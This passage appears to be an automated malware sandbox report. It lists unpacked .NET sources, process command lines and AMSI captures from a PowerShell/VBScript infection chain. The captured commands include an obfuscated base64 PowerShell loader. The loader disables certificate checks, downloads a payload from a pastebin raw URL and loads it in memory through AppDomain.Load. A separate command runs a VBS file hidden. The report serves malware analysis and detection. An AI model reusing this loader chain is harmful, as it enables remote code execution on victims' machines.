                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, 4Q2ibNxyBllaUbuES.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{EbvtVjzdwvbRTWudA[2],gNcBSL9UPrQHBDmUF.JMsdl19vGU2jGWaRz(Convert.FromBase64String(EbvtVjzdwvbRTWudA[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 4.2.powershell.exe.28700478df0.2.raw.unpack, Class1.cs	.Net Code: MsqBIbY System.AppDomain.Load(byte[])
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, 4Q2ibNxyBllaUbuES.cs	.Net Code: ZsPuYsgyWtYvjRnlJ System.AppDomain.Load(byte[])
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, 4Q2ibNxyBllaUbuES.cs	.Net Code: Y9nt7JRhx6AOzIydJ System.AppDomain.Load(byte[])
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, 4Q2ibNxyBllaUbuES.cs	.Net Code: Y9nt7JRhx6AOzIydJ
                Source: 4.2.powershell.exe.287017daf68.0.raw.unpack, Class1.cs	.Net Code: MsqBIbY System.AppDomain.Load(byte[])
                Source: 4.2.powershell.exe.2877ca20000.4.raw.unpack, Class1.cs	.Net Code: MsqBIbY System.AppDomain.Load(byte[])
                Source: 14.2.powershell.exe.272d7b8ec50.0.raw.unpack, Class1.cs	.Net Code: MsqBIbY System.AppDomain.Load(byte[])
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, 4Q2ibNxyBllaUbuES.cs	.Net Code: ZsPuYsgyWtYvjRnlJ System.AppDomain.Load(byte[])
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, 4Q2ibNxyBllaUbuES.cs	.Net Code: Y9nt7JRhx6AOzIydJ System.AppDomain.Load(byte[])
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, 4Q2ibNxyBllaUbuES.cs	.Net Code: Y9nt7JRhx6AOzIydJ
                Source: 14.2.powershell.exe.272d6819978.1.raw.unpack, Class1.cs	.Net Code: MsqBIbY System.AppDomain.Load(byte[])
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = 
$KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;$global:?
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = 
$KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;$global:?
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( 
[system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\Desktop\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));"
                Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848E700BD pushad ; iretd 2_2_00007FF848E700C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FF848E700BD pushad ; iretd 5_2_00007FF848E700C1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_0595E410 pushfd ; iretd 7_2_0595E411
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_0595D7E3 pushad ; ret 7_2_0595D7E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_0595E373 push esp; iretd 7_2_0595E379
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FF848E80028 push eax; ret 12_2_00007FF848E80029
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FF848E85E9D push eax; retf 14_2_00007FF848E85F71
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, XYfrwW5V593UMwIH2.cs High entropy of concatenated method names: 'ItHc8NJ5k7ZtzJKAZ', 'Eb3vd67ceIchdOkiX', '_3D7Gn9Kw6yfIxqRJO', '_5PXS3q04AZHSMmy6OFu2FfkiseYHLTZaigLhKzo1MISQheUH7CKFshjb1Cle4Ob97dVQRqRl2zqUmzSPZIGc', 'YCJAqWvH64WVSp9bvnHWYpBmNlhqhjnJpzM3Ftk7UqkLNKMkoECQYNM5JSwJSh6HukHqUuEuIzNEPZa1RKzN', 'QOeu5YGf32YHKzOhIM7IjkTSIve1IOEUx7vKMBlOMlJ922GH0sxU64s0v2oqxWevKaF2pUM8HDddFZoLwgQb', 'uCwuP8WRzNLTedkvO99lo42mJKnDD458EQrzDhcOa0miJM9w4uZah6dgk1s02LQ2edt5aEUcKpDizzZrHJcb', 'EXTWBLsDIXcBtJSyg851l7mYfaoZr50H491p1hCPqEy0Hw8vAz9MCfib9tnU7QI6oP8c5pxIr2TSzW3OE46s', 'ry76lfycDTEEJ7vgzezcZosD6iKpXYC8kmCYR1tqtymNiXIBkUcAcdEvthBeOCY0uOPM32WKJLxlTdEntMGe', 'ZdAa0PDognTctZ8IYw8qxy32aDx5SN7EpMPlfExp3mJxT9KjdqixnJg0NyvccsWDcvV3M01sonz21Wvfbggm'
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, ZpzrPEZWa4qWEcgScAD5NnsFlzPm2Y9.cs High entropy of concatenated method names: 'J8i9LR7WPfUm6lW25HtbTXzahDWe8rK3sa7vLQ2sKx0fbQ564', '_8tVhzDzSvnMENa6xZNBF8DTzRwfmWBnGtf4sZelYENLEh5hGD', 'nDSUS8CZiikAT0XcFHNbtJ36kUrMYs0HQ9hW4jLocFKFFxfxS', 'qnE5uWusqQvQ7TwQuk2yvfLox4IBSWyIEdNEtzOq4fGfzjOZ9'
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, EcmUVfa1L5XqkaIH6HbHkBiwj0eT9cf.cs High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'UMCPdJLg9iSRyhqP5FvuxVkzjCVrRuyyeTIDEqd4FJjUwsod0', 'SzrlcrGfy2u2qC7Iqs28vw5W46QgvrmeOwbwZztYWZvBbRvY7', 'EZPZj8foG2zP034kJM2GoBglg1xdz0Pq8u5yuHkqBX4wdflVh', 'kAPcN0kjRmrGe6pWclWkSwmbxPQiNj5tyZ7bLTzNcyYkWgC6D'
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, gNcBSL9UPrQHBDmUF.cs High entropy of concatenated method names: '_9B22Czp8skaw03xiR', 'hxSg8DMICskDTdoCS', 'MoemDsyMcPqZkQmFl', 'o0vipdyf1OR0ObXGC', 'UNgWlPJWKMnqjzLcC', 'oxN7UbaO4yjGdpcJ8', 'bXlppUX8DSBKrkOdu', 'dxUoO4xhcUzx8oO5J', '_8XfpFbokqCYleOWEk', 'NW8vqva4N9hXuPWGQ'
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, uZaXYBDZ6KheGbUfWnzSAabcEeeKPaY.cs High entropy of concatenated method names: 'br5eXuRVodgprDprWkCH3hlNi0uAyjq', 'huGMrIY793DeOvfpUaR7E0efSazDjry', 'RdsVqV7T3SuKZEp0FRpelYIHFByhBb1', '_51hXy89Hpv2exsGmU8getVVsb6IpCQP', 'pHQarxZg3Y7dOzlBoBfai8Q9GFjrfT5PP4htnu9UgYzBAi3pQ', 'imMUI5fEHwIG5o6gCoRWHNMco0qKWmqbDJhm3pQMQOnqk8L8u', 'zbd7zSMSH9TA8ISQUMqBkYhQC3jzXAQmMSyJMHp5ossUoDW7s', '_4dhtSd1ohqWIJpgU39W8XwMoqyBHktflfxVBR5ojWOWpBGv3D', 'IfH9jiTSaG8rVzVGVL8V2H6HtyEd0NEym60n0lZjzvct0N3RD', 'XRQJ25mbptn811DUe7igV0KPzx2FDoOzCjmNLBOHQ13uVkctP'
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, 8ly6sYOYGHY603xNL.cs High entropy of concatenated method names: 'sLYNuXqXwrGcoibVr', 'bNKycKIBtmRtxmPs4RSl2ywEoKHqMVzgDxon8o5p0gPrzRtRlCV71qInEpOvTWheAbC', 'SB8FbkxQv2FsTOH98lOMb38jnVL1w7Mu1ikdfVSSSXlpHBXvZIvAIpFwtv3RAIYQYAG', 'bAO2WcjBwkzl7q5i22aj0t67Tcg0WiSBoRp0QkKJOZDpTru1dRbblJOZAOnEh40zixe', 'JBfwxwoHWOChqJPbCdnaiPi4roExDsqERoIiK4YyxT8VqRIdW9T6SaFyGLaP9WRG46c'
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, 4Q2ibNxyBllaUbuES.cs High entropy of concatenated method names: 'hqwMgvdTj6DxGmf4z', 'ZsPuYsgyWtYvjRnlJ', 'yKhQHew7k4ctpljue', 'YjvlW8vjJsH2uipxy', 'PdgEfFB0qqQQuh6Wf', 'RqccMv1T262c0QvEh', 'aRPJytsm2eLmOdLpe', 'i3jteoSI0etjX9adc', 'wU70MvasodcIojkyZ', 'wF3KJ9B1qqB8BORea'
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, md2LJQvBQNx1MN7eq.cs High entropy of concatenated method names: 'B7oHbSdkSekEZCEpe', 'rkBmSWmP8fsbiCbB8', 'XmivMOV2gPJWWW1qN', 'G6MlGij3qlLcy1gj3', '_7SGKsw3blHvncLZka', 'E4aHUO5Gp37AeSChb', '_4xgo7J0swz0RYjSo3', '_3X2jrP8IPinsurV8E', 'WA2IheLBxfG6dg0TV', 'lZ5NFpdf7RJUPYP9P'
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, Hf0jRXweJYx23320j.cs High entropy of concatenated method names: '_92sGAFfeSeEOY0xu6', 'JX0Nr18GmvFpa7SKqcaScZseZm6mdUQK5p66QOl0g6Rqwj8U9pcCUXkITLCnQeyAqKt', 'J7pLtFgW2B7Ht6AwgpuqxB7EpezdukgcFx3kKRqjlpCjOzHcUpAc62NRYcP4O56YjHo', 'U9w54ISTyQUq3K51Mlqmk81AQ2JHvSQPmNKJswg4Rf0K54SYDqacwHXnXqsLNFCzH3h', 'jVigYWjUotvmqlIwSfewdgstGGArnunYFuMVYkpUEo59e5p4xzOBnmBLljTx63FIluC'
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, fVIHnGEA1n2LyrMvHdB5ZJhyHVgWioG.cs High entropy of concatenated method names: 'VID28M9oZZYEM2JrUREYVz2QQT0zJ32', '_58URoK9IgBYP2nb12hCOuf6pMkyIsc5', 'BVMJMIgQWUeVzuViyxK09rU9HfDXmUz', 'd9qDZrxHmQPLwHS8KYjnUT3vdWW0rTY', 'ZS7BS6os0ql3YUQhAsMbKa7E89PZeUs', 'apAgjHd7IxfhBGZoC', 'N1W8xawn9mgdDSljN', 'oF3A0sgfCWW7RXkXV', 'miWvrTPhqtSVLdT8P', 'iSBXZTAL97lagi6Lu'
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, XYfrwW5V593UMwIH2.cs High entropy of concatenated method names: 'ItHc8NJ5k7ZtzJKAZ', 'Eb3vd67ceIchdOkiX', '_3D7Gn9Kw6yfIxqRJO', '_5PXS3q04AZHSMmy6OFu2FfkiseYHLTZaigLhKzo1MISQheUH7CKFshjb1Cle4Ob97dVQRqRl2zqUmzSPZIGc', 'YCJAqWvH64WVSp9bvnHWYpBmNlhqhjnJpzM3Ftk7UqkLNKMkoECQYNM5JSwJSh6HukHqUuEuIzNEPZa1RKzN', 'QOeu5YGf32YHKzOhIM7IjkTSIve1IOEUx7vKMBlOMlJ922GH0sxU64s0v2oqxWevKaF2pUM8HDddFZoLwgQb', 'uCwuP8WRzNLTedkvO99lo42mJKnDD458EQrzDhcOa0miJM9w4uZah6dgk1s02LQ2edt5aEUcKpDizzZrHJcb', 'EXTWBLsDIXcBtJSyg851l7mYfaoZr50H491p1hCPqEy0Hw8vAz9MCfib9tnU7QI6oP8c5pxIr2TSzW3OE46s', 'ry76lfycDTEEJ7vgzezcZosD6iKpXYC8kmCYR1tqtymNiXIBkUcAcdEvthBeOCY0uOPM32WKJLxlTdEntMGe', 